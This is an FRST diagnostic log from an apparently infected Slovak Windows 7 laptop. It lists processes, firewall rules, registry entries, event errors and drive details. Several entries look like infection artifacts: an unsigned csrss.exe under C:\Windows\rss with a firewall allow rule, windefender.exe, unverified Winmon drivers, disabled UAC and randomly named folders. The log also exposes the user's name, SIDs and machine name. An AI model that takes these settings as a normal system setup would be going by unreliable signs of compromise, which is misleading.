2019-10-21 13:56 - 2019-10-21 13:56 - 002286747 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\LIBEAY32.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000416627 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\SSLEAY32.dll
2019-05-12 10:51 - 2019-05-12 10:51 - 005196800 _____ (University of Tsukuba) [File not signed] C:\Program Files\SoftEther VPN Client\VpnGatePlugin_x64.dll
2019-04-02 17:10 - 2017-03-20 15:13 - 000087552 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppCollect.dll
2019-04-02 17:10 - 2017-03-20 15:13 - 000197632 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppCommon.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea => ""="Service"
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 03:34 - 2020-01-22 20:05 - 000000027 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 localhost

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGizadie plochy.bmp
DNS Servers: 192.168.0.1
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rmsCe65wKzPTw5jtS38n2tVEGi => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [{0D112C7C-66E1-4D54-AEB0-EE8E3A163F04}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{E7E2670E-7962-4AFA-8A93-AD4B754A76A2}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{C9127F07-56E6-49D5-A059-BE4717D6DCD0}C:\portable\utorrent-portable\utorrent.exe] => (Allow) C:\portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{046EB926-BC54-4B7B-8553-B4B8557D4320}C:\portable\utorrent-portable\utorrent.exe] => (Allow) C:\portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [{33BE3F4B-2176-4BF9-8DAD-71F2993C7E22}] => (Allow) C:\Portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [{034F37EC-98CC-400F-A7F2-54D67FA53CE7}] => (Allow) C:\Portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{72EA0069-1AE7-4F99-B211-021D3B204CC0}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) [File not signed]
FirewallRules: [UDP Query User{7FF58BC0-AE02-48BE-B6F5-0B8F96943D04}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) [File not signed]
FirewallRules: [{0957BBF0-D65F-4D9C-B51D-C765EA416DF7}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel(R) Wireless Connectivity Solutions -> )
FirewallRules: [TCP Query User{88E30C4A-334F-4EB7-935A-7BC2452751D3}C:\program files\filezilla ftp client\filezilla.exe] => (Allow) C:\program files\filezilla ftp client\filezilla.exe (Tim Kosse -> FileZilla Project)
FirewallRules: [UDP Query User{4C22E9E2-776E-4273-B65F-CB1E71B0E17B}C:\program files\filezilla ftp client\filezilla.exe] => (Allow) C:\program files\filezilla ftp client\filezilla.exe (Tim Kosse -> FileZilla Project)
FirewallRules: [TCP Query User{D5552FCB-7B8C-4A55-BCDA-866776675FD0}C:\program files\qtox\bin\qtox.exe] => (Allow) C:\program files\qtox\bin\qtox.exe () [File not signed]
FirewallRules: [UDP Query User{FDC9932A-896B-42DE-A1CE-0406F806B579}C:\program files\qtox\bin\qtox.exe] => (Allow) C:\program files\qtox\bin\qtox.exe () [File not signed]
FirewallRules: [{D75DA9A3-9755-4F80-98D4-2EF07ED17614}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{6A3D486A-8B54-46A8-90CD-2B592EB9EBF6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9050C82E-1247-429A-85DB-56FE67C39482}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{3D1F2024-BC68-44C6-9035-211A5E556D48}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{611DFF0B-0DAB-4871-9AD2-91E4F9D70647}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [UDP Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [{0FDF3415-E5D8-493C-96D4-75A240355D2B}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{DB7D1A44-D27A-4E0E-85C6-691CEDCD37BC}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{95E4E855-A7CB-4193-AA0F-7B889EEF6193}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{F7955E18-9789-4EEB-9C13-711CCA694B6A}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{99CE8752-A44F-4307-A1EE-4F54DEA2A760}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{0ADB4278-50BC-4AFE-AAE9-EFE1BB2E4547}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{36E5F241-C08F-46E0-9466-1BC748A813DD}] => (Allow) C:\Users\Jomko\AppData\Local\Temp\7zS4058\HP.EasyStart.exe No File
FirewallRules: [{A79F7F72-CB8D-485D-B340-54C21C43C48B}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\bin\EWSProxy.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{2936F1E8-01AA-413E-BF0B-9B7345CD6630}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{795728F4-FA31-4D9B-A4AB-78BB97087FA6}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{CC296BD8-C7AE-41FF-ADE9-3E0587CC9E2F}] => (Allow) LPort=5357
FirewallRules: [{35CA4271-53ED-4C97-986D-044960622E1F}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{7AC26099-BE7F-4BFA-BEAF-FB184655BFC1}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [UDP Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{72A5A12A-716B-4CFA-BD0C-3A90C219130B}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [TCP Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [UDP Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [{178817BF-A27F-4435-B34B-EEB2ECFB48E7}] => (Allow) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOptionsMgr.EXE (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{63563E85-64C7-44E9-BB6F-8669228E4EF9}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E3904F86-8649-41ED-8BE1-960F80CE1B03}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{2D08EE70-88F2-4649-8299-B182B79733E6}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{8A4FB251-5506-42DA-AB5C-14C992BB4DFE}] => (Allow) C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
FirewallRules: [{9D9FB80D-2A4F-444D-B2C1-818FF186B9B7}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{EAEBB15E-23FF-4F2F-9A5B-23A2C12AE1A5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================


==================== Faulty Device Manager Devices ============

Name: Bluetooth Server
Description: Bluetooth Server
Class Guid: {34446e8e-37b4-4b16-9da6-bea2db33465a}
Manufacturer: Intel Corporation
Service: btmaux
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: WinmonProcessMonitor
Description: WinmonProcessMonitor
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: WinmonProcessMonitor
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: ========================

Application errors:
==================
Error: (02/06/2020 09:26:55 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST64.exe version 2.2.2020.2 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 26b4

Start Time: 01d5dd2b691f3bb9

Termination Time: 2

Application Path: E:\install\FRST64.exe

Report Id: 00482e41-491f-11ea-9cd7-0c8bfd901919

Error: (02/06/2020 09:04:16 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.

Error: (02/06/2020 09:04:16 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.

Error: (02/06/2020 09:04:16 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (02/06/2020 08:58:16 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/27/2020 06:29:44 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/26/2020 10:57:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.

Error: (01/26/2020 10:57:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.


System errors:
=============
Error: (02/06/2020 09:09:50 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.

Error: (02/06/2020 09:09:50 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.

Error: (02/06/2020 09:09:50 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.

Error: (02/06/2020 09:09:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.

Error: (02/06/2020 08:58:19 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Nasledujúce ovládače pre spustenie zavedenia alebo spustenie systému zlyhali pri načítaní:
cdrom

Error: (02/06/2020 08:58:15 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Spustenie služby Main Service zlyhalo kvôli nasledujúcej chybe:
Systém nemôže nájsť zadaný súbor.

Error: (01/27/2020 06:30:01 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Nasledujúce ovládače pre spustenie zavedenia alebo spustenie systému zlyhali pri načítaní:
cdrom

Error: (01/27/2020 06:29:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Spustenie služby Main Service zlyhalo kvôli nasledujúcej chybe:
Systém nemôže nájsť zadaný súbor.


Windows Defender:
===================================
Date: 2019-09-17 22:50:36.541
Description:
Windows Defender scan has been stopped before completion.
Scan ID:{D3AB2F47-DE50-48D7-A60C-9877224729C3}
Scan Type:AntiSpyware
Scan Parameters:Quick Scan

Date: 2018-07-04 22:05:48.863
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:1.271.442.0
Previous Signature Version:1.269.1075.0
Update Source:User
Signature Type:AntiSpyware
Update Type:Delta
Current Engine Version:1.1.15000.2
Previous Engine Version:1.1.14901.4
Error code:0x80070666
Error description:Už je nainštalovaná iná verzia produktu. Inštaláciu tejto verzie nemožno dokončiť. Ak chcete existujúcu verziu produktu nakonfigurovať alebo odstrániť, použite ovládací panel Pridať alebo odstrániť programy.

Date: 2018-07-04 22:05:48.863
Description:
Windows Defender has encountered an error trying to update the engine.
New Engine Version:1.1.15000.2
Previous Engine Version:1.1.14901.4
Update Source:User
Error Code:0x80070666
Error description:Už je nainštalovaná iná verzia produktu. Inštaláciu tejto verzie nemožno dokončiť. Ak chcete existujúcu verziu produktu nakonfigurovať alebo odstrániť, použite ovládací panel Pridať alebo odstrániť programy.

CodeIntegrity:
===================================

Date: 2020-02-06 20:58:11.850
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-02-06 20:58:11.835
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-01-26 22:55:16.111
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-01-26 22:55:16.096
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-01-26 22:55:01.178
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-01-26 22:55:01.147
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

BIOS: TOSHIBA 1.90 09/19/2014
Motherboard: TOSHIBA VG10S
Processor: Intel(R) Core(TM) i7-4700MQ CPU @ 2.40GHz
Percentage of memory in use: 96%
Total physical RAM: 8103.89 MB
Available physical RAM: 319.92 MB
Total Virtual: 22102.04 MB
Available Virtual: 11561.28 MB

==================== Drives ================================

Drive c: (Windows 7) (Fixed) (Total:143.37 GB) (Free:13.21 GB) NTFS
Drive d: (Windows 10) (Fixed) (Total:94.4 GB) (Free:12.26 GB) NTFS
Drive e: (data) (Fixed) (Total:465.76 GB) (Free:24.75 GB) NTFS

\\?\Volume{fddfa42c-f3c0-11e7-944c-806e6f6e6963}\ (Vyhradené systémom) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
\\?\Volume{ff0173d9-491a-11ea-9cd7-806e6f6e6963}\ () (Fixed) (Total:0.61 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 3C2BC5FC)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: C14F8450)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=143.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=94.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=622 MB) - (Type=27)

==================== End of Addition.txt =======================

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-02-2020 02
Ran by Jomko (administrator) on JOMKO_WIN7 (TOSHIBA SATELLITE P50-A-13C) (06-02-2020 21:28:34)
Running from C:\Users\Jomko\Desktop
Loaded Profiles: Jomko (Available Profiles: Jomko)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Slovenčina (Slovensko)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGin-0502.exe
() [File not signed] C:\Users\Jomko\AppData\Local\Temp\wup\wup.exe
() [File not signed] C:\Windows\rss\csrss.exe
(Access Denied) [File not signed] C:\Windows\windefender.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://WWW.ALL2PDF.COM) C:\Windows\System32\PrintCtrl.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com) C:\Windows\System32\PrintDisp.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com) C:\Windows\System32\PrintDisp.exe
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Atheros Communications Inc. -> Atheros Communications) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(EpicNet Inc.) [File not signed] C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
(IDT, Inc.) [File not signed] C:\Program Files\IDT\WDM\stacsv64.exe
(Intel Corporation - Software and Firmware Products -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Intel Corporation -> ) C:\Windows\System32\igfxTray.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel(R) Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel(R) Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel(R) Wireless Connectivity Solutions -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Logitech Inc -> Logitech) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\laclient.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOptionsMgr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Windows Media Audio AEC for Media Foundation) (Access Denied) C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c\PortableDeviceClassExtension.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe
Failed to access process -> SearchProtocolHost.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll [7953576 2017-05-10] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
HKLM\...\Run: [PrintDisp] => C:\Windows\system32\PrintDisp.exe [588936 2015-08-18] (ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [976032 2011-09-16] (Atheros Communications Inc. -> Atheros Communications) [File not signed]
